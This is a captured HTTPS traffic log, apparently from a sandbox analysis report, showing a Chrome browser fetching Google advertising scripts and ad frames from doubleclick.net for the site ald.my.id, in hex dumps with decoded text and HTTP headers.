                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC1390INData Raw: 5f 72 65 71 75 65 73 74 73 3d 5b 5d 29 3b 63 6f 6e 73 74 20 62 3d 70 61 28 6c 2e 64 6f 63 75 6d 65 6e 74 29 3b 62 2e 73 72 63 3d 61 3b 6c 2e 67 6f 6f 67 6c 65 5f 69 6d 61 67 65 5f 72 65 71 75 65 73 74 73 2e 70 75 73 68 28 62 29 7d 3b 6c 65 74 20 4a 3d 6e 75 6c 6c 3b 76 61 72 20 72 61 3d 28 29 3d 3e 7b 69 66 28 21 4a 29 62 3a 7b 76 61 72 20 61 3d 6e 61 28 29 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 74 72 79 7b 63 6f 6e 73 74 20 63 3d 61 5b 62 5d 2e 66 72 61 6d 65 73 2e 67 6f 6f 67 6c 65 5f 65 73 66 3b 69 66 28 63 26 26 49 28 63 29 29 7b 4a 3d 63 3b 62 72 65 61 6b 20 62 7d 7d 63 61 74 63 68 28 63 29 7b 7d 4a 3d 6e 75 6c 6c 7d 28 61 3d 4a 29 3f 28 28 62 3d 61 2e 65 73 66 5f 70 72 6f 70 41 72 72 61 79 29 7c 7c 28 62
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: _requests=[]);const b=pa(l.document);b.src=a;l.google_image_requests.push(b)};let J=null;var ra=()=>{if(!J)b:{var a=na();for(var b=0;b<a.length;b++)try{const c=a[b].frames.google_esf;if(c&&I(c)){J=c;break b}}catch(c){}J=null}(a=J)?((b=a.esf_propArray)||(b
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC1390INData Raw: 71 75 65 49 64 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 7d 7d 3b 63 6f 6e 73 74 20 4f 3d 6c 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2c 46 61 3d 21 21 28 4f 26 26 4f 2e 6d 61 72 6b 26 26 4f 2e 6d 65 61 73 75 72 65 26 26 4f 2e 63 6c 65 61 72 4d 61 72 6b 73 29 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6c 65 74 20 62 3d 21 31 2c 63 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 62 7c 7c 28 63 3d 61 28 29 2c 62 3d 21 30 29 3b 72 65 74 75 72 6e 20 63 7d 7d 28 28 29 3d 3e 7b 76 61 72 20 61 3b 69 66 28 61 3d 46 61 29 7b 76 61 72 20 62 3b 69 66 28 4d 3d 3d 3d 6e 75 6c 6c 29 7b 4d 3d 22 22 3b 74 72 79 7b 61 3d 22 22 3b 74 72 79 7b 61 3d 6c 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 7d 63 61 74 63 68 28 63 29 7b 61 3d 6c 2e 6c 6f 63 61 74 69 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: queId=Math.random()}};const O=l.performance,Fa=!!(O&&O.mark&&O.measure&&O.clearMarks),P=function(a){let b=!1,c;return function(){b||(c=a(),b=!0);return c}}(()=>{var a;if(a=Fa){var b;if(M===null){M="";try{a="";try{a=l.top.location.hash}catch(c){a=l.locatio
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC1390INData Raw: 63 2c 64 2b 31 2c 66 29 29 3b 72 65 74 75 72 6e 20 65 2e 6a 6f 69 6e 28 63 5b 64 5d 29 7d 7d 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 6f 62 6a 65 63 74 22 29 72 65 74 75 72 6e 20 66 7c 7c 28 66 3d 30 29 2c 66 3c 32 3f 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 49 61 28 61 2c 62 2c 63 2c 64 2c 66 2b 31 29 29 3a 22 2e 2e 2e 22 3b 72 65 74 75 72 6e 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 53 74 72 69 6e 67 28 61 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4b 61 28 61 29 7b 6c 65 74 20 62 3d 31 3b 66 6f 72 28 63 6f 6e 73 74 20 63 20 69 6e 20 61 2e 68 29 63 2e 6c 65 6e 67 74 68 3e 62 26 26 28 62 3d 63 2e 6c 65 6e 67 74 68 29 3b 72 65 74 75 72 6e 20 33 39 39 37 2d 62 2d 61 2e 69 2e 6c 65 6e 67 74 68 2d 31 7d 0a 66 75
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: c,d+1,f));return e.join(c[d])}}else if(typeof a==="object")return f||(f=0),f<2?encodeURIComponent(Ia(a,b,c,d,f+1)):"...";return encodeURIComponent(String(a))}function Ka(a){let b=1;for(const c in a.h)c.length>b&&(b=c.length);return 3997-b-a.i.length-1}fu
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC1390INData Raw: 6f 6e 2e 61 6e 63 65 73 74 6f 72 4f 72 69 67 69 6e 73 26 26 67 2e 6c 6f 63 61 74 69 6f 6e 2e 61 6e 63 65 73 74 6f 72 4f 72 69 67 69 6e 73 2e 6c 65 6e 67 74 68 3d 3d 6b 2e 6c 65 6e 67 74 68 2d 31 29 66 6f 72 28 71 3d 31 3b 71 3c 6b 2e 6c 65 6e 67 74 68 3b 2b 2b 71 29 7b 76 61 72 20 78 3d 6b 5b 71 5d 3b 78 2e 75 72 6c 7c 7c 28 78 2e 75 72 6c 3d 67 2e 6c 6f 63 61 74 69 6f 6e 2e 61 6e 63 65 73 74 6f 72 4f 72 69 67 69 6e 73 5b 71 2d 31 5d 7c 7c 22 22 2c 78 2e 6c 3d 21 30 29 7d 76 61 72 20 74 3d 6b 3b 6c 65 74 20 4e 3d 6e 65 77 20 42 61 28 6c 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 21 31 29 3b 67 3d 6e 75 6c 6c 3b 63 6f 6e 73 74 20 58 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 66 6f 72 28 78 3d 58 3b 78 3e 3d 30 3b 2d 2d 78 29 7b 76 61 72 20 75 3d 74 5b 78 5d 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: on.ancestorOrigins&&g.location.ancestorOrigins.length==k.length-1)for(q=1;q<k.length;++q){var x=k[q];x.url||(x.url=g.location.ancestorOrigins[q-1]||"",x.l=!0)}var t=k;let N=new Ba(l.location.href,!1);g=null;const X=t.length-1;for(x=X;x>=0;--x){var u=t[x];
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC1330INData Raw: 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3d 3d 22 63 6f 6d 70 6c 65 74 65 22 3f 51 61 28 29 3a 55 2e 67 26 26 68 61 28 28 29 3d 3e 7b 51 61 28 29 7d 29 7d 29 28 29 3b 76 61 72 20 52 61 3d 61 3d 3e 7b 54 2e 67 3d 62 3d 3e 7b 65 61 28 61 2c 63 3d 3e 7b 63 28 62 29 7d 29 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 53 61 28 61 29 7b 61 3d 61 3d 3d 3d 6e 75 6c 6c 3f 22 6e 75 6c 6c 22 3a 61 3d 3d 3d 76 6f 69 64 20 30 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 61 3b 48 3d 3d 3d 76 6f 69 64 20 30 26 26 28 48 3d 6a 61 28 29 29 3b 76 61 72 20 62 3d 48 3b 72 65 74 75 72 6e 20 6e 65 77 20 6b 61 28 62 3f 62 2e 63 72 65 61 74 65 48 54 4d 4c 28 61 29 3a 61 29 7d 3b 76 61 72 20 54 61 3b 69 66 28 54 61 3d 66 61 29 7b 76 61 72 20 56 3d 22 49 46 52 41 4d 45 22 2c 56 61 3d 64 6f 63 75 6d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: nt.readyState=="complete"?Qa():U.g&&ha(()=>{Qa()})})();var Ra=a=>{T.g=b=>{ea(a,c=>{c(b)})}};function Sa(a){a=a===null?"null":a===void 0?"undefined":a;H===void 0&&(H=ja());var b=H;return new ka(b?b.createHTML(a):a)};var Ta;if(Ta=fa){var V="IFRAME",Va=docum


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          43192.168.2.749768142.250.185.1944432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC1923OUTGET /pagead/ads?client=ca-pub-2542884292174911&output=html&h=600&twa=1&slotname=3704632056&adk=3031347918&adf=2571581873&pi=t.ma~as.3704632056&w=243&abgtt=3&fwrn=4&fwrnh=100&lmt=1728897154&rafmt=1&armr=4&format=243x600&url=https%3A%2F%2Fald.my.id%2F&fwr=0&rs=1&rh=250&rw=243&rpe=1&resp_fmts=4&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152700&bpp=11&bdt=1788&idt=1670&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&correlator=2303771533125&frm=20&pv=2&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=1037&ady=6&biw=1280&bih=907&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759842%2C95338737%2C44798934%2C95343454%2C95344778&oid=2&pvsid=3856392468538169&tmod=1611993855&uas=0&nvt=2&ref=https%3A%2F%2Fald.my.id%2F&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C128 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          Host: googleads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC788INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Observe-Browsing-Topics: ?1
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: cafe
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 14-Oct-2024 09:27:36 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC602INData Raw: 33 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 74 6f 70 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 27 7b 22 6d 73 67 5f 74 79 70 65 22 3a 22 72 65 73 69 7a 65 2d 6d 65 22 2c 22 6b 65 79 5f 76 61 6c 75 65 22 3a 5b 7b 22 6b 65 79 22 3a 22 72 5f 6e 68 22 2c 22 76 61 6c 75 65 22 3a 22 30 22 7d 2c 7b 22 6b 65 79 22 3a 22 72 5f 69 66 72 22 2c 22 76 61 6c 75 65 22 3a 22 74 72 75 65 22 7d 2c 7b 22 6b 65 79 22 3a 22 71 69 64 22 2c 22 76 61 6c 75 65 22 3a 22 43 4f 62 4d 69 2d 66 44 6a 59 6b 44 46 61 6a 4d 4f 77 49 64 55 55 51 4c 78 77 22 7d 5d 2c 22 67 6f 6f 67 4d 73 67 54 79 70 65 22 3a 22 73 74 68 22 7d 27 2c 20 27 2a 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 348<!DOCTYPE html><html><head><script>window.top.postMessage('{"msg_type":"resize-me","key_value":[{"key":"r_nh","value":"0"},{"key":"r_ifr","value":"true"},{"key":"qid","value":"CObMi-fDjYkDFajMOwIdUUQLxw"}],"googMsgType":"sth"}', '*');</script><script
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC245INData Raw: 69 79 35 49 33 2d 4a 38 36 5f 6e 74 77 5c 5c 5c 22 2c 31 37 36 32 35 39 33 31 35 36 2c 5c 5c 5c 22 2f 5c 5c 5c 22 2c 5c 5c 5c 22 61 6c 64 2e 6d 79 2e 69 64 5c 5c 5c 22 2c 32 5d 5d 2c 5b 5c 5c 5c 22 49 44 3d 34 32 39 38 33 33 34 66 34 66 35 62 37 65 65 39 3a 54 3d 31 37 32 38 38 39 37 31 35 36 3a 52 54 3d 31 37 32 38 38 39 37 31 35 36 3a 53 3d 41 41 2d 41 66 6a 5a 61 4f 7a 70 6a 7a 62 48 66 4a 55 37 71 72 73 6c 76 2d 2d 6a 51 5c 5c 5c 22 2c 31 37 34 34 34 34 39 31 35 36 2c 5c 5c 5c 22 2f 5c 5c 5c 22 2c 5c 5c 5c 22 61 6c 64 2e 6d 79 2e 69 64 5c 5c 5c 22 5d 5d 22 7d 5d 2c 22 67 6f 6f 67 4d 73 67 54 79 70 65 22 3a 22 73 74 68 22 7d 27 2c 20 27 2a 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: iy5I3-J86_ntw\\\",1762593156,\\\"/\\\",\\\"ald.my.id\\\",2]],[\\\"ID=4298334f4f5b7ee9:T=1728897156:RT=1728897156:S=AA-AfjZaOzpjzbHfJU7qrslv--jQ\\\",1744449156,\\\"/\\\",\\\"ald.my.id\\\"]]"}],"googMsgType":"sth"}', '*');</script></head></html>
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          44192.168.2.749767142.250.185.1944432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC1858OUTGET /pagead/ads?client=ca-pub-2542884292174911&output=html&h=250&slotname=3704632056&adk=1080356790&adf=1713894358&pi=t.ma~as.3704632056&w=300&abgtt=3&lmt=1728897154&format=300x250&url=https%3A%2F%2Fald.my.id%2F&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152711&bpp=36&bdt=1799&idt=1960&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=243x600&correlator=2303771533125&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=525&ady=100&biw=1280&bih=907&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759842%2C95338737%2C44798934%2C95343454%2C95344778&oid=2&pvsid=3856392468538169&tmod=1611993855&uas=0&nvt=2&ref=https%3A%2F%2Fald.my.id%2F&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7CfeE%7C&abl=CF&pfx=0&fu=0&bc=31&bz=1&td [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          Host: googleads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC788INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Observe-Browsing-Topics: ?1
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: cafe
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 14-Oct-2024 09:27:36 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC602INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 6a 73 63 56 65 72 73 69 6f 6e 20 3d 20 27 72 32 30 32 34 31 30 30 39 27 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 67 6f 6f 67 6c 65 5f 63 61 73 6d 3d 5b 5d 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 48 54 4d 4c 2c 42 4f 44 59 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 7d 23 6d 79 73 2d 77 72 61 70 70 65 72 7b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 77 69 64 74 68 3a 31 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 8000<!DOCTYPE html><html lang=en><head><meta charset="UTF-8"><script>var jscVersion = 'r20241009';</script><script>var google_casm=[];</script><style>HTML,BODY{height:100%;width:100%;margin:0;padding:0;overflow:hidden;}#mys-wrapper{height: 100%;width:10
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 20 41 3a 61 63 74 69 76 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 69 6e 68 65 72 69 74 3b 7d 5b 64 69 72 3d 72 74 6c 5d 20 2e 66 6c 69 70 2d 6f 6e 2d 72 74 6c 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2d 31 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 63 65 6e 74 65 72 3b 7d 23 6d 79 73 2d 63 6f 6e 74 65 6e 74 7b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 7a 2d 69 6e 64 65 78 3a 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 64 61 74 61 2d 6e 6c 3d 22 73 71 75 61 72 65 22 20 64 61 74 61 2d 6e 73 3d 22 6e 73 2d 69 71 33 6b 39
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: A:active{color:inherit;cursor:pointer;text-decoration:inherit;}[dir=rtl] .flip-on-rtl{transform:scale(-1,1);transform-origin:center;}#mys-content{flex-shrink:0;position:relative;overflow:hidden;z-index:0;}</style><style data-nl="square" data-ns="ns-iq3k9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 39 2d 65 2d 31 34 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 7d 2e 6e 73 2d 69 71 33 6b 39 2d 65 2d 31 30 7b 2d 6d 79 73 2d 73 63 6f 72 65 3a 31 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 30 3b 68 65 69 67 68 74 3a 34 30 70 78 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 2e 6e 73 2d 69 71 33 6b 39 2d 65 2d 31 32 7b 2d 6d 79 73 2d 73 63 6f 72 65 3a 31 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 30 3b 77 69 64 74 68 3a 33 30 30 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 31 39 34 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 32 2e 35 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 9-e-14{display:block;flex-shrink:0;}.ns-iq3k9-e-10{-mys-score:1;display:block;flex-shrink:0;flex-grow:0;height:40px;border:none;}.ns-iq3k9-e-12{-mys-score:1;display:block;flex-shrink:0;flex-grow:0;width:300px;max-width:1948px;max-height:162.5px;min-height
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 2e 6e 73 2d 69 71 33 6b 39 2d 65 2d 31 2c 2e 6e 73 2d 69 71 33 6b 39 2d 65 2d 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 35 66 34 66 66 3b 7d 2e 6e 73 2d 69 71 33 6b 39 2d 65 2d 34 7b 63 6f 6c 6f 72 3a 23 30 30 33 38 36 36 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 22 4f 70 65 6e 20 53 61 6e 73 22 2c 41 72 69 61 6c 3b 7d 2e 6e 73 2d 69 71 33 6b 39 2d 65 2d 35 2c 2e 6e 73 2d 69 71 33 6b 39 2d 65 2d 31 37 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 7d 2e 6e 73 2d 69 71 33 6b 39 2d 65 2d 36 7b 63 6f 6c 6f 72 3a 23 30 30 33 38 36 36 3b 7d 2e 6e 73 2d 69 71 33 6b 39 2d 65 2d 31 30 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 74 70 63 2e 67 6f 6f 67
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: .ns-iq3k9-e-1,.ns-iq3k9-e-2{background-color:#e5f4ff;}.ns-iq3k9-e-4{color:#003866;font-family:"Open Sans","Open Sans",Arial;}.ns-iq3k9-e-5,.ns-iq3k9-e-17{white-space:nowrap;}.ns-iq3k9-e-6{color:#003866;}.ns-iq3k9-e-10{background-image:url(https://tpc.goog
